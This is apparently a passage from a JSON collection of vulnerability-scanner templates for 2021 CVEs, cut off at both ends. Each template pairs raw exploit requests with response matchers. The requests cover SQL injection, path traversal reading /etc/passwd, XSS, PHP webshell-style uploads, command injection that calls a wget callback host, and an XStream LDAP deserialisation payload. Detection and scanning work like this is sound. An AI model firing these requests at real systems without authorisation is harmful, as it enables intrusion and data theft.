name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-46418","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Creation","severity":"high"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{randstr}}\n","GET /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201","contains(server_1, \"lighttpd\") && contains(content_type_2, \"text/plain\")","contains(body_2, \"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24442","info":{"name":"Wordpress Polls Widget < 1.5.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Forwarded-For: {{randstr}}\n\nquestion_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains_all(body, \"{\\\"answer_name\", \"vote\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEB-INF/web.xml"],"matchers":[{"type":"dsl","internal":true,"dsl":["!contains_all(body, '</web-app>', 'java.sun.com')","!contains_all(header, 'application/xml')","status_code != 200","status_code != 404"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, '</web-app>', 'java.sun.com')","contains_all(header, 'application/xml')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey <1.5.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd","{{BaseURL}}/api/geojson?url=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(echo {{string}}>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{string}}"]}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-24956","info":{"name":"Blog2Social < 6.8.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"><script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" name=","Your Activity"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site 